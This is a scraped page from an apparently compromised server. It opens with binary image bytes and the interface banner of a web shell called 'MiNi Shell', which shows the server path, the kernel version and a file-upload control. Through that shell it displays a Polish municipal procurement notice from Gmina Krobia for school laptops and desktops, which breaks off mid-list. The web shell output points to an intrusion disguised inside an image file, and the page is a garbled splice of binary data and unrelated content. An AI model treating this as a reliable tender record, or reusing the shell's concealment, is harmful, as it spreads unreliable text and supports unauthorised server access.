JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220602/0019095601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> DOSTAWA SPRZĘTU KOMPUTEROWEGO W RAMACH REALIZACJI PROJEKTU CYFROWA GMINA - &#34;WSPARCIE DZIECI Z RODZIN PEGEEROWSKICH W ROZWOJU CYFROWYM - GRANTY PPGR” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KROBIA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 411050623</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">RYNEK 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krobia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-840</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">655711111</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">655711111</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@krobia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.krobia.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> DOSTAWA SPRZĘTU KOMPUTEROWEGO W RAMACH REALIZACJI PROJEKTU CYFROWA GMINA - &#34;WSPARCIE DZIECI Z RODZIN PEGEEROWSKICH W ROZWOJU CYFROWYM - GRANTY PPGR” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-442d90b8-e23a-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00190956</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00023774/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa sprzętu komputerowego w ramach realizacji projektu Cyfrowa Gmina - &#34;Wsparcie dzieci z rodzin pegeerowskich w rozwoju cyfrowym - Granty PPGR”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> &#34;Wsparcie dzieci z rodzin pegeerowskich w rozwoju cyfrowym - Granty PPGR”, Oś V. Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia - REACT-EU Działanie 5.1 Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia Program Operacyjny Polska Cyfrowa na lata 2014 – 2020” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/krobia. <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/krobia.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w tym składanie ofert,<br/>wymiana informacji oraz przekazywanie dokumentów lub<br/>oświadczeń między Zam. a Wyk. odbywa się przy użyciu środków komunikacji elektronicznej za<br/>pośrednictwem Platformy Zakupowej.<br/>1. Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem<br/>https://platformazakupowa.pl/pn/krobia.<br/>2. W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między<br/>Zam. a Wyk., w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane<br/>były za pośrednictwem https://platformazakupowa.pl/pn/krobia i formularza „Wyślij wiadomość do<br/>zamawiającego”.<br/>3. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za<br/>pośrednictwem https://platformazakupowa.pl/pn/krobia. Informacje dotyczące odpowiedzi na pytania,<br/>zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na<br/>platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami<br/>adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za<br/>pośrednictwem https://platformazakupowa.pl/pn/krobia do konkretnego Wykonawcy.<br/>4. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości<br/>bezpośrednio na https://platformazakupowa.pl/pn/krobia przesłanych przez Zamawiającego, gdyż<br/>system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>5. Zamawiający, zgodnie z § 3 ust. 3 Rozporządzenia Prezesa Rady Ministrów w sprawie użycia<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz<br/>udostępnienia i przechowywania dokumentów elektronicznych ( dalej: “Rozporządzenie w sprawie<br/>środków komunikacji”), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>https://platformazakupowa.pl/pn/krobia, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Https://platformazakupowa.pl/pn/krobia działa według standardu przyjętego w komunikacji sieciowej -<br/>kodowanie UTF8,<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>6. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z https://platformazakupowa.pl/pn/krobia określone w Regulaminie<br/>zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za<br/>wiążący,<br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem.<br/>7. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją<br/>korzystania z https://platformazakupowa.pl/pn/krobia, w szczególności za sytuację, gdy Zamawiający<br/>zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce<br/>„Wyślij wiadomość do zamawiającego”).<br/>Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w<br/>przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 Ustawy<br/>Pzp.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Gmina Krobia, ul. Rynek 1, 63-840 Krobia<br/>2) administrator wyznaczył Inspektora Danych Osobowych Pana Janusza Niezbrzyckiego, z którym<br/>można się kontaktować pod adresem e-mail: jniezbrzycki@wp.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego dot.: DOSTAWY SPRZĘTU KOMPUTEROWEGO W RAMACH REALIZACJI PROJEKTU CYFROWA GMINA - &#34;WSPARCIE DZIECI Z RODZIN PEGEEROWSKICH W ROZWOJU CYFROWYM - GRANTY PPGR”<br/><br/> prowadzonym w<br/>trybie podstawowym;<br/>4) odbiorcami Pani/Pana danych osobowych mogą być osoby lub podmioty, którym udostępniona<br/>zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>7) posiada Pani/Pan:<br/>a) prawo dostępu do swoich danych osobowych;<br/>b) prawo do sprostowania danych osobowych (skorzystanie z prawa do sprostowania nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego<br/>załączników);<br/>c) prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>8) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WO.271.24.2022.ZP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ NR 1:<br/>DOSTAWA LAPTOPÓW W LICZBIE 246 SZTUK OBEJMUJĄCA: laptopy z oprogramowaniem fabrycznym -System operacyjny -zgodnie z opisem w załączniku nr 1,2 i 3 ( PUNKT V SWZ -OPIS PRZEDMIOTU ZAMÓWIENIA)<br/>Nazwa komponentu	Wymagane minimalne parametry techniczne komputerów<br/>Typ	Komputer przenośny typu notebook z ekranem 15,6&#34; o rozdzielczości:<br/>FHD (1920x1080) VWA w technologii LED przeciwodblaskowy<br/>Procesor	Procesor klasy x86, 2 rdzeniowy, zaprojektowany do pracy w komputerach przenośnych, taktowany zegarem, co najmniej 3,00 GHz, z pamięcią cache L3 co najmniej 6 MB, <br/>Zaoferowany procesor musi uzyskiwać jednocześnie w teście Passmark CPU Mark wynik min.: 6300 punktów (wynik zaproponowanego procesora znajduje się w załączniku Nr2 )<br/>Pamięć operacyjna RAM	1 x 8GB DDR4 min. jeden slot wolny na dalszą rozbudowę, możliwość rozbudowy do min 16GB <br/><br/><br/>Parametry pamięci masowej	256 GB SSD M.2 NVMe możliwość rozbudowy o drugi dysk SATA 2,5” <br/><br/>Karta graficzna	Zintegrowana w procesorze z możliwością dynamicznego przydzielenia pamięci systemowej, ze sprzętowym wsparciem dla DirectX 12, osiągająca w teście Average G3D Mark wynik na poziomie min.: 1600 punktów (wynik zaproponowanego procesora znajduje się w załączniku Nr 3)<br/>Wyposażenie multimedialne	Karta dźwiękowa stereo, wbudowane 2 głośniki (stereo<br/>Wbudowany w obudowę matrycy mikrofon wraz z kamerą HD <br/>Wymagania dotyczące baterii i zasilania	3-ogniwowy, 41WHr, Li-Ion. <br/>Zgodność z systemami operacyjnymi i standardami	Licencja na system operacyjny Microsoft Windows 11 Home PL lub równoważny. Klucz instalacyjny systemu operacyjnego powinien być fabrycznie zapisany w BIOS komputera i wykorzystywany do instalacji tego systemu oraz jego aktywowania. <br/>System operacyjny ma być zainstalowany na dostarczonym Sprzęcie. Opis<br/>równoważności znajduje się w Załączniku nr 1 do Opisu przedmiotu zamówienia.<br/>Certyfikaty i standardy	•	Certyfikat ISO9001:2000 dla producenta sprzętu (należy załączyć do oferty)<br/>•	Certyfikat ISO 14001 dla producenta sprzętu (należy załączyć do oferty)<br/>•	Potwierdzenie spełnienia kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych w postaci oświadczenia producenta jednostki<br/>•	Potwierdzenie kompatybilności komputera na stronie Microsoft Windows Hardware Compatibility List na daną platformę systemową (wydruk ze strony)<br/>Wymagania dodatkowe	1.	Wbudowane porty i złącza: <br/>2. 1 x HDMI, <br/>3. 1 x USB 2.0 Type-A<br/>4. 2 x USB 3.1 Type-A,<br/>5. 1 x Wi-Fi 802.11ac 1x1 z modułem Bluetooth </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 498459,96 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213100-6 - Komputery przenośne</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty, zamawiający będzie się kierował następującymi kryteriami: <br/><br/>- CENA znaczenie – 60 %<br/><br/>- GWARANCJA znaczenie – 40 % <br/><br/>Kryterium „CENA” – ocenie zostanie poddana cena brutto oferty za realizację całości zamówienia, obliczona przez wykonawcę, podana w „FORMULARZU OFERTOWYM”. Maksymalną liczbę punktów, tj. 60 pkt otrzyma wykonawca, który zaproponuje najniższą cenę brutto (cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia) pozostali natomiast proporcjonalnie mniej. <br/>Oceny pozostałych ofert zostaną przeliczone według następującego wzoru: <br/><br/><br/> Cena brutto najniższej zaproponowanej oferty<br/><br/> Ocena = ---------------------------------------------------------------------- x 60<br/> <br/> Cena brutto oferty badanej<br/><br/><br/>Kryterium „GWARANCJA” – ocena punktowa w kryterium „GWARANCJA” dokonana zostanie zgodnie z procedurą opisaną poniżej:<br/><br/>Punkty za kryterium gwarancja zostaną przyznane Wykonawcy na podstawie oświadczenia dotyczącego okresu udzielonej gwarancji zawartego w formularzu oferty. Punkty za kryterium „Gwarancja&#34; zostaną obliczone w następujący sposób: <br/><br/>Gwarancja minimum 12 miesięcy – 0 pkt <br/>Gwarancja 24 miesięcy – 20 pkt <br/>Gwarancja 36 miesięcy – 40 pkt <br/><br/>Przy ocenie ofert będzie brany pod uwagę okres udzielonej gwarancji (w miesiącach). Maksymalny okres gwarancji podlegający punktacji to 36 miesięcy. Oznacza to, że Wykonawca, który zaproponuje okres gwarancji dłuższy niż 36 miesięcy nie otrzyma więcej niż 40 punktów. <br/>Jeśli Wykonawca nie poda w formularzu ofertowym okresu gwarancji zgodnie z wymogami (zostanie zaoferowany przez Wykonawcę okres gwarancji poniżej 12 miesięcy lub nie zostanie wpisany okres gwarancji), złożona przez niego oferta w kryterium „GWARANCJA” otrzyma 0 pkt.<br/><br/>Długość okresu gwarancji ma zostać wskazana skokowo, zgodnie z poziomami wskazanymi powyżej. W przypadku wskazania okresu gwarancji spoza wskazanych wyróżnionych okresów, Zamawiający przyzna punktację zgodną z najbliższym, niższym poziomem punktacji określonej powyżej.<br/><br/>2.	Liczby punktów w poszczególnych kryteriach („CENA”, „GWARANCJA”) zostaną zsumowane. Oferta, która uzyska największą liczbę punktów w poszczególnych kryteriach będzie ofertą najkorzystniejszą. Punktacja będzie liczona z dokładnością do dwóch miejsc po przecinku. <br/>3.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiada zasadom określonym w ustawie Prawo zamówień publicznych oraz wszystkim wymaganiom określonym w swz i który uzyskał najwyższą liczbę punktów w wyżej wymienionych kryteriach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">GWARANCJA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ NR 2:<br/>DOSTAWA KOMPUTERÓW STACJONARNYCH W LICZBIE 28 SZTUK OBEJMUJĄCA: zestawy komputerowe z oprogramowaniem fabrycznym -System operacyjny zgodnie z opisem w załączniku nr 1,2 i 3 ( PUNKT V SWZ -OPIS PRZEDMIOTU ZAMÓWIENIA)<br/><br/><br/><br/>KOMPUTER STACJONARNY Z MONITOREM – 28 SZT. <br/><br/>Nazwa komponentu	Wymagane minimalne parametry techniczne komputerów<br/>System operacyjny	Licencja na system operacyjny Microsoft Windows 11 Home PL lub równoważny. Klucz instalacyjny systemu operacyjnego powinien być fabrycznie zapisany w BIOS komputera i wykorzystywany do instalacji tego systemu oraz jego aktywowania. <br/>System operacyjny ma być zainstalowany na dostarczonym Sprzęcie. Opis równoważności znajduje się w Załączniku nr 1 do Opisu przedmiotu zamówienia.<br/>Matryca	Matowa, LED, IPS lub WVA<br/>Rozmiar matrycy od 23 do 25 cali<br/>Wyświetlana rozdzielczość: max 1920x1080<br/>Procesor	Procesor klasy x86, zaprojektowany do pracy w komputerach stacjonarnych. Zaoferowany procesor musi uzyskiwać jednocześnie w teście Passmark CPU Mark wynik min.: 5100 punktów (wynik zaproponowanego procesora znajduje się w załączniku Nr2 )<br/><br/>Pamięć	8 GB<br/>Pamięć masowa	Technologia: SSD, <br/>Pojemność: min. 240 GB<br/>Karta graficzna	Zintegrowana: tak<br/>Dodatkowa: nie<br/>Karta sieciowa<br/>	LAN 10/100/1000 Mbps<br/><br/>Dźwięk	Zintegrowana karta dźwiękowa<br/>Wbudowany mikrofon<br/>Wbudowane głośniki stereo<br/>Kamera internetowa	1.0 Mpix<br/>Porty	•	USB: 4 szt.<br/>•	złącza RJ-45: 1 szt.<br/>•	Wi-Fi 802.11a/b/g/n/ac<br/>•	1 x HDMI<br/>•	uniwersalne 